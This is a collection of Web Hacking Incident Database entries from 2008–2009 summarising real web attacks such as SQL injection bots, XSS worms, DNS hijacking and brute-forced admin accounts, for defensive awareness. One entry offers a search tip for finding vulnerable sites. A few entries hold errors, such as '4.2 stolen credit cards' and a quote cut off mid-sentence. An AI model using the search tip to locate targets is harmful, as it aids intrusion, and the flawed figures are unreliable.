Someone, and not for the first time, succeeded in manipulating Google Trends, a Google service listing popular search terms. In this case the New York Times reports that a symbol presumably denoting 9/11 reached number 2 in the list of Hot Trends (see picture right).

While this may be nothing more than a joke, the capability to create a trend can have a huge and sometimes devastating effect. After all, in recent months the future of big financial institutions was determined by the rumor mill.

On the technical side, insufficient anti-automation controls have been one of the more obscure and hardest to fix vulnerabilities in web applications. Starting with the Lexis-Nexis incident (WHID 2005-65), many incidents were waved off as nothing more than an automated client. However, as the incidents pile up, it becomes clear that it is the responsibility of the site owner to mitigate such harmful automation attacks.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-2: Twitter accounts of the famous hacked (Updated)
WHID ID: 2009-2
Date Occured: 1/5/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

Update (Jan 11th 2009) - The hacker bragged about the hack and revealed that it was a brute force dictionary attack against an administrator account. Twitter does not block repetitive login failures, thereby enabling brute force attacks. We are still leaving the incident classification as "insufficient authentication" in addition to brute force, as we feel an administration interface should have additional authentication mechanisms and not just a password.



Twitter announced that a hacker broke into 33 accounts, including Obama's now inactive Twitter account. The hack is a result of a flaw in a web based support tool used by Twitter, which was evidently accessible externally without proper authorization.

It is important to note that this incident is not related to the Twitter phishing attack which occurred on the previous weekend.

This incident highlights the issue of public facing administration interfaces, which often combine strong functionality with less attention to quality and therefore security. As organizations virtualize, those interfaces become available over the Internet, often without sufficient protection.

You can read some of the funny things that the hacker published in different Twitter accounts on Read Write Web.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: USA
Attacked System Technology: Administration Tool
Cost:
Items Leaked: Password
Number of Records: 33
Additional Link:
Entry Title: WHID 2009-1: Gaza conflict cyber war
WHID ID: 2009-1
Date Occured: 1/5/2009
Attack Method: Various
Application Weakness: Insufficient Authentication
Outcome: Downtime
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

Update (Jan 13, 2009) - Ynet, an Israeli paper, reports that many of the sites defaced were actually DNS hijacked following a break-in to the servers of DomainTheNet, an Israeli registrar. And just like other recent DNS hijacking incidents, the fault was lack of sufficient authentication: the hackers got hold of passwords to the administration system.

Update (Jan 10, 2009) - Zone-H reports that in addition to Israeli sites, Turkish hackers are also targeting USA and NATO web sites using SQL injection.

The war in Gaza, like most modern wars, moved immediately to cyberspace. Islamic and Arab groups all over the world are using the Internet to retaliate against Israeli web sites. Some of the reported incidents are:

  • Israeli bank site hacked by an Islamic group
  • Hundreds of Israeli web sites hacked in 'Propaganda War'

Like every war, this one is not one sided. Interestingly enough, since this is a war between a country and a guerrilla organization, the cyber war, which focuses mostly on conquering the minds of people, is shaped similarly. The Israeli cyber war activity is mostly funneled through legal channels rather than hacking, as described by Wired. However, unlike the physical war, which only the Israeli military is conducting, in cyberspace Israelis join the hacking war by themselves. Arutz 7, an Israeli media site, reports that a group of students released a tool that performs distributed denial of service attacks against Hamas web sites. The students' site itself provides news alerts about the cyber war between Israel and Hamas.

Editor's notes: (1) As a policy, we decided to report each such conflict as a single incident, unless some hack is especially of interest. (2) The author of this incident is Israeli.

Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.ynetnews.com/articles/0,7340,L-3649281,00.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-60: Miley Cyrus Pictures Leaked Due to a Web Hack (Updated)
WHID ID: 2008-60
Date Occured: 10/20/2008
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

Update (April 19th 2009) - E!News provides additional interesting details about Josh Holly, the hacker who carried out the attack. They actually took the trouble to go to Holly's hometown and ask people about him, providing an interesting insight into the celebrity hacking phenomenon.


Celebs are fast becoming a prime hacking target. Miley Cyrus already made her debut at WHID when her Twitter account was raided. But it seems that this was not her first cyber incident. As reported by Wired, late last year a hacker named Josh Holly published private photos of Ms. Cyrus stolen from her Gmail account.

The hack was a relatively sophisticated one and a very good example of the risks of Web 2.0. Holly penetrated a MySpace administrator's account using social engineering. Using the account he gained access to a list of passwords which MySpace stored in an unencrypted form. Unbelievable. Since most of us use the same password for multiple services, Holly used Cyrus' MySpace password on her Gmail account, gaining access and retrieving the photographs.

In a related but as yet unconfirmed story, Holly claims to have used the MySpace administrative account for an advertising scam by which he gained $50,000.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-59: Spotify Streaming Music Service Hacked and Millions of Records Leaked
WHID ID: 2008-59
Date Occured: 12/19/2008
Attack Method: Stolen Credentials
Application Weakness: Insufficient Transport Layer Protection
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: Sweden
Incident Description:

This time we may need to remove the word "web", leaving this incident classified only as "application security". Spotify is a new radio-like music streaming service from Sweden. A weakness in Spotify's streaming protocol enabled hackers to gain access to users' encrypted passwords, email addresses, birth dates, gender, postal codes and billing receipts.

An interesting aspect of this incident is that while the vulnerability was discovered and fixed on December 19th, the fact that it was actually exploited was discovered only in March 2009. Many times companies report that a vulnerability was found on their site, but that they are not aware of any exploitation of the vulnerability. As this incident shows, even if the company is not aware of it, there is a chance that the vulnerability was exploited.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-58: New Orkut Worm in Brazil
WHID ID: 2008-58
Date Occured: 10/4/2008
Attack Method: Worm
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

XSSed reports another XSS worm in Orkut. Since Orkut is big in Brazil, it is quite natural that a Brazilian group created the worm.

I have used this occasion to sort out worm reporting in WHID.

  • A worm is now considered an Attack_Method rather than an outcome. If nothing else, the outcome of a worm is "planting of malware": itself.
  • I have added a "Web 2.0" organization type as many of the XSS worms infect Web 2.0 sites.

Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Brazil
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-57: Craigslist's Battle Against Spammers
WHID ID: 2008-57
Date Occured: 5/22/2008
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Link Spam
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description:

Insufficient anti-automation is fast becoming the #1 threat to web sites. Since CAPTCHA has proved practically useless, especially when there is a financial gain from automating access to the site, sites are pretty much defenceless against harmful automation. Techdirt's story about Craigslist losing the battle against automation tools is a very good example of this serious problem.

Read the comments, they are enlightening. As usual, one of the problems when spam is involved is defining if and what is wrongdoing and what is a valid action. Some commenters say that Craigslist has become useless due to the spam, while others say that Craigslist is the worst censor on the Internet, not letting small time businesses work. Others argue about whether this is a crime or not. 132 comments, and they keep coming 8 months after the article was published.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-56: Soulja Boy Myspace Hacked
WHID ID: 2008-56
Date Occured: 9/1/2008
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Extortion
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description:

This is the first time a hacking report is a video clip. If, like me, you find it hard to understand, you can read a written summary on this Kiwi site. I guess that their readers also needed a translation of the speech in the video to English.

In a nutshell, hackers defaced Soulja Boy's MySpace page and published his e-mail and YouTube passwords on the net. They demanded $2,500 to give him his web presence back. For an artist that grew out of the Internet this presence is naturally very important; however, he is now important enough that his record label was able to contact the different sites and get him his web properties back without paying the money.

In this case I have decided to categorize the attacked entity as Soulja Boy and not MySpace or YouTube, as I used to do in the past. The fact that the attack was against Soulja Boy properties around the web makes him, rather than any technology platform, the attack target.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-55: Hackers hijack bitchy fashion blog
WHID ID: 2008-55
Date Occured: 4/23/2008
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

It might have been a random hack, but the pornographic pictures splashed on an insider fashion industry blog were quickly blamed on the fashion icons and magazines offended by the blog.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-54: Hacker Redirects Obama's site to Hillary Clinton's
WHID ID: 2008-54
Date Occured: 4/18/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Netcraft reports that a hacker managed to redirect traffic from Barack Obama's web site to Hillary Clinton's site during the primaries held between the two. The culprit, an XSS bug in the community blogs section of Obama's site, highlights the danger of user contributed content on web sites.

An interesting side story is that Oliver Friedrichs from Symantec was quoted in a Computer World article only a week earlier saying that presidential campaign web sites are "clueless" about security. Was this a prophecy of, or the trigger for, the hack?

Additional technical information can be found on XSSed.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-53: 'SQL by Design' leaks Thousands of SSNs at an Oklahoma Gov site
WHID ID: 2008-53
Date Occured: 4/14/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Alex Papadimoulis hits again with a report on leakage of information from Oklahoma's Department of Corrections web site. The detailed report is very interesting and highlights one of the worst types of SQL injection out there: remote SQL by design.

A unique form of SQL injection, or perhaps just a close sibling, remote SQL by design is a vulnerability in which the web application accepts SQL statements from the client in the normal course of operation. The SQL statement might be placed in a hidden field, or generated on the fly by a client side script. In any case, it is extremely difficult to prevent alteration of the SQL statement by a user in such applications, making them highly vulnerable.

To find out for yourself how common this vulnerability is, just Google for SELECT, FROM and WHERE in the URL. Amazing.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-52: The Hannaford Breach
WHID ID: 2008-52
Date Occured: 3/17/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

While the Hannaford breach, which resulted in 4.2 stolen credit cards and 1800 known fraud cases, may not be a web hack, a Computer World article mentioned that the company's web site was off line following the breach. Even if the breach itself was not a result of web site issues, such issues were probably found in the security review to follow the breach, making the incident a worthy addition to WHID.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=Disaster+Recovery&articleId=9068999&taxonomyId=151&pageNumber=1
Entry Title: WHID 2008-51: TrendMicro web site hit
WHID ID: 2008-51
Date Occured: 3/15/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography: Japan
Incident Description:

The infamous SQL injection bot has hit TrendMicro, which is worrying considering that TrendMicro is there to protect us from malware. Unfortunately it seems that web security is still underrated outside of a small group of experts, even though it is fast becoming the modern day equivalent of the now declining viruses and worms.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-50: The Indian government acknowledges hacking incidents
WHID ID: 2008-50
Date Occured: 2/29/2008
Attack Method: Various
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description:

In an official Indian government response to a question in the Indian parliament, the Minister of State for Communications and Information Technology discusses hacking incidents which occurred between 2005 and 2008 in a large number of Indian government agencies. The interesting information is the list of agencies affected:

  • Ministry of Railways,
  • Air Cargo Customs (Mumbai),
  • Forward Markets Commission,
  • National Institute of Health and Family Welfare,
  • National Institute of Social Defence,
  • Department of Administrative Reforms and Public Grievances,
  • Wireless Planning & Coordination Wing,
  • Bharat Sanchar Nigam Limited,
  • Telecom Regulatory Authority of India,
  • Department of Information Technology and
  • Anthropological Survey of India.

Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-49: ValueClick weak decryption and vulnerability to SQL injection
WHID ID: 2008-49
Date Occured: 3/17/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Marketing
Attacked Entity Geography: USA
Incident Description:

As a side story to the FTC's indictment of ValueClick for deceptive marketing, the FTC investigation also found SQL injection vulnerabilities and a lack of sufficient encryption of sensitive customer information. These findings contributed to the $2.9 million fine the FTC levied on ValueClick, as well as to the company being dropped from managing eBay's affiliate program.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-48: TicketMaster Fighting Hackers Line Bypassing
WHID ID: 2008-48
Date Occured: 3/9/2008
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Extortion
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Update (April 19th 2009) - A recent article in the Vancouver Sun further discusses the issue. While there are no new technical details, the discussion that follows the article is illuminating.


Insufficient anti-automation is fast becoming a major, if not the major, threat to web applications. On the one hand it can be very profitable for the attacker; on the other, it is far from a simple vulnerability requiring just a quick fix.

TicketMaster's ongoing battle with hackers who bypass the queue to buy event tickets and resell them at a high price is a very good example of the issue. In this specific example the hackers demonstrate that CAPTCHA, a method of blocking automated programs by presenting a challenge supposedly difficult for software to solve, is not sufficient.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-47: The Federal Suppliers Guide validates login credential in JavaScript
WHID ID: 2008-47
Date Occured: 2/29/2008
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Marketing
Attacked Entity Geography: USA
Incident Description:

Alex Papadimoulis tells in a brilliantly humorous way about the lack of security of the Federal Suppliers Guide's web site. The guide is presumably limited to federal procurement agents only, but at the time of writing the credential check was done on the client in JavaScript, against a single global user name and password.

Beyond making a mockery of the claim that the guide was limited to federal agents only, the restriction also seemed to be a marketing method, as it prevents potential advertisers from checking who is in the guide. After getting in, Alex contacted some of the advertisers, only to find out that none of them got any value from the guide. Alex did not join, and I wonder how much Alex's report lowered the Federal Suppliers Guide's earnings.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-46: CheckFree customers redirected to fraudsters sites
WHID ID: 2008-46
Date Occured: 12/2/2008
Attack Method: DNS Hijacking
Application Weakness: Insufficient Authentication
Outcome: Phishing
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

In an attack with an alarming similarity to the COX incident (WHID 2008-45), but with far greater potential damage, hackers changed the DNS records for CheckFree, the largest bill payment service in the USA. Customers were redirected to servers in the Ukraine, which attempted to install password-logging software on their computers.

The change was made using valid credentials to log in to the administrative web site of Network Solutions, CheckFree's domain registrar. It is as yet unknown how the hackers obtained the credentials. Since phishing attacks against domain registrars, including Network Solutions, have started to surface recently, a good guess is that it was through a phishing attack.

According to CheckFree's report to the authorities, it estimates that around 160,000 customers were exposed to the attack, and it informed 5 million potential victims who may have been among this group.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Ukraine
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-45: Comcast domain hijacked
WHID ID: 2008-45
Date Occured: 1/5/2009
Attack Method: Domain Hijacking
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Recently domain names have been the focus of hacking activity. Hackers found that hijacking a domain is as effective as, if not more effective than, attacking the web site itself.

Is domain hijacking a case of web hacking? Should it be included in WHID? In this case it seems, according to the Wired report, that the hack itself involved attacking the domain registrar's (Network Solutions) web interface.

However, we believe that the resulting "virtual" defacement of the web site by redirecting users to a fraudulent web site is still a web hack, even if the DNS hijacking is not web related.

The defaced site, as logged by the registrar, was:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-44: Balkan cyber wars
WHID ID: 2008-44
Date Occured: 4/1/2008
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

The interesting ZDNet report about the cyber war around Kosovo is unique in describing the process. According to the report, hacker groups on each side share information in order to make attacks more efficient: some collect vulnerable web sites, while others use automatic defacement tools to attack them.

On the positive side, the report states that at the time of writing there is a ceasefire and the parties are negotiating. Is there room for cyber peace alongside cyber war?


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-43: Russian nuclear power web sites attacked amid accident rumors
WHID ID: 2008-43
Date Occured: 1/5/2009
Attack Method: Unknown
Application Weakness:
Outcome:
Attacked Entity Field: Government
Attacked Entity Geography: Russia
Incident Description:

Novosti, the Russian news agency, reports what seems to be a planned two-pronged attack intended to cause panic by spreading a rumor about a nuclear accident near St. Petersburg.

At the same time that e-mails spreading the rumor were distributed, hackers blocked access to the web sites that would have let the public check the status of the nuclear power plant for themselves, intensifying the panic.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-42: Chinese hackers steal 9 million items of personal information from South Koreans
WHID ID: 2008-42
Date Occured: 12/30/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Various
Attacked Entity Geography: South Korea
Incident Description:

The Dark Visitor, a Chinese hacking insider site, and the Korean Chosun report that a Chinese hacker used a commercially available SQL injection tool called HDMI to penetrate a large number of South Korean sites and steal 9 million personal information items, which he then sold for approximately $15,000 to South Koreans for them to abuse.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-41: A Joomla first day exploit
WHID ID: 2008-41
Date Occured: 8/12/2008
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Defacement
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

Joomla is a widely used open source content management system. Many administrators report that a vulnerability announced on August 12th was immediately exploited by hackers to attack Joomla-based web sites. Another report shows a specific site that was defaced by exploiting the same vulnerability.

This incident shows the importance of timely patching, but also brings back the age-old debate around the publication of vulnerabilities by researchers. Does it contribute to software security, or does it just help the hackers?


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Joomla
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-40: Olympics news sites hit with attacks
WHID ID: 2008-40
Date Occured: 8/12/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: India
Incident Description:

Like many Asprox bot SQL injection attacks, the one on NDTV.com, a New Delhi TV station's web site, has its unique aspects.

First, the attack came at absolutely the wrong time: just when all eyes (and mouse clicks) were turned to the Olympic games in Beijing, the NDTV web site, which carried real-time information from the games, was hacked, greatly extending the infection rate.

In addition, the information was syndicated from a French news agency. While apparently the agency did not have anything to do with the hack, it did catch some fire over the incident, as some experts suggested it should have helped its customers protect their systems.

More information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-39: Hacker compromises a south african political party web site
WHID ID: 2008-39
Date Occured: 8/7/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: South Africa
Incident Description:

The South African Democratic Alliance party's web site seems like another random victim of the Asprox family of bots. This specific incident demonstrates several issues:

  • Asprox successfully attacks organizations that should really know better.
  • While most known cases of Asprox attacks result in the planting of malware on the web site, since this is easily detected by malware search services, the very brutal injection used by Asprox probably takes down more sites than it infects with malware.
  • According to one comment, the site used an outdated version of WordPress, stressing again the problem of not upgrading in a timely manner, especially with open source software.

More information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Russia
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-38: DNSChanger Trojans v4.0
WHID ID: 2008-38
Date Occured: 12/4/2008
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Fraud
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

The DNSChanger Trojan uses different methods to manipulate the DNS lookups of the victim. One of the most malicious techniques is using CSRF against the ADSL or cable router to modify its DNS settings.

More Information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-37: Pakistani hacker attacks Indian Rail site, threatens cyber war on India
WHID ID: 2008-37
Date Occured: 12/24/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description:

The web site of the Indian Eastern Railway company was hacked. The hacker planted malware on the site and added a message to the home page declaring a cyber war on Indian Cyberspace.

Additional Information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Pakistan
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-36: RBS WorldPay Data Breach Hits 1.5 Million (Updated)
WHID ID: 2008-36
Date Occured: 11/10/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

Update (Feb 4th 2009): While RBS reported that just 100 cards were abused in the incident, news has now surfaced that those cards were heavily abused: the hackers managed to lift the withdrawal limit and distribute copies of the cards around the world, so that in total 9 million dollars were withdrawn from them in a matter of hours before they were blocked. At least, as the saying goes, losing $100 is your problem; losing a million is the bank's.


The Royal Bank of Scotland (RBS) confirmed that a hacker performed a "sophisticated cyber intrusion" on the RBS WorldPay unit's web site. 1.5 million credit card numbers and 1.1 million social security numbers may have been stolen.

At this time the only abuse known is the fraudulent use of about 100 reloadable cards, which are used by companies to pay their employees.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-35: Business Week site hit by malware
WHID ID: 2008-35
Date Occured: 9/15/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description:

Business Week is the latest victim of Asprox, a botnet using SQL injection attacks to plant malware. Internet News reports that Sophos has discovered malware on a large number of pages on the magazine’s web site. A Google Safe Browsing report, which checks how many pages on a web site, if any, are infected with malware, peaked at 214 out of 2,157 pages on the site, just shy of 10%.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-34: Adobe hit by malware
WHID ID: 2008-34
Date Occured: 10/17/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description:

Adobe joins the long list of sites hit by Asprox, a botnet using SQL injection attacks to plant malware. Internet News reports that Sophos has discovered malware on Adobe's “Vlog it” and “Serious Magic” sites.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-33: Chinese hacker jailed for false quake alarm
WHID ID: 2008-33
Date Occured: 5/29/2008
Attack Method: Unknown
Application Weakness: Insufficient Authorization
Outcome: Disinformation
Attacked Entity Field: Government
Attacked Entity Geography: China
Incident Description:

A Chinese student penetrated the Shaanxi Provincial Seismic Bureau's web site and planted a false warning of an earthquake expected the following night, reports The Australian.
The false warning created panic, especially since it came shortly after the devastating earthquake that hit China just a few weeks earlier. The faked warning drew 767 page views within 10 minutes, and the bureau’s phones immediately became very busy.
As expected in China, the authorities were far from forgiving, and the student was jailed for 18 months.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-32: Yahoo HotJobs XSS
WHID ID: 2008-32
Date Occured: 10/26/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Session Hijacking
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Netcraft reported an ongoing exploit of an XSS vulnerability in the Yahoo HotJobs site. The attackers have been using obfuscated JavaScript to steal victims' session cookies, which were in turn sent to a server in the US.
The stolen cookie was a Yahoo-wide cookie, and therefore by stealing it the hackers could gain control of every Yahoo service accessible to the victim, including Yahoo! Mail.
Netcraft identified the issue by observing irregular activity by its toolbar users, and Yahoo! fixed the vulnerability shortly after, on Oct 28th.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.netcraft.com/archives/2008/10/26/ongoing_phishing_attack_exposes_yahoo_accounts.html
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-31: Hacker takes $50,000 a few cents at a time
WHID ID: 2008-31
Date Occured: 9/20/2008
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Monetary Loss
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Californian Michael Largent used an automated script to open 58,000 such accounts, collecting many thousands of the small payments used to verify credit cards when opening accounts.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-30: Security breach hits DivShare, unauthorized access to its database
WHID ID: 2008-30
Date Occured: 9/20/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description:

The popular document and media sharing service DivShare suffered a security breach that allowed a malicious user to access its database, which included user e-mail addresses and other basic profile information.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-29: Sunwear hacks metasploit.com?
WHID ID: 2008-29
Date Occured: 9/20/2008
Attack Method: ARP spoofing
Application Weakness: Insufficient Transport Layer Protection
Outcome: Defacement
Attacked Entity Field: Internet
Attacked Entity Geography:
Incident Description:

Someone hacked a machine on the same subnet and was ARP spoofing the gateway. The metasploit.com machines were not compromised, but all HTTP requests coming into the ISP network were passed through a MITM defacer that inserted that HTML. Once I was able to set a static ARP entry and notify the ISP, the problem was resolved. So, to make things clear, the metasploit.com servers were not hacked, the ISP


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-28: Confidential data on thousands of students exposed by test preparatory firm
WHID ID: 2008-28
Date Occured: 9/20/2008
Attack Method: Misconfiguration
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: New York, NY
Incident Description: While moving to a new hosting provider, a system by Princeton Review used by students to prepare for a state assessment program exposed, due to misconfiguration, the records of approximately 34,000 students from 2nd to 10th grade. The information included names, Florida IDs (which are nearly identical to US Social Security numbers) and the students' exam reports. The information was available online from late June to early August.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.nytimes.com/2008/08/19/technology/19review.html?_r=3&adxnnl=1&oref=slogin&adxnnlx=1221859844-4bHK03P+zrmLhJ5Ul2SlPA
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
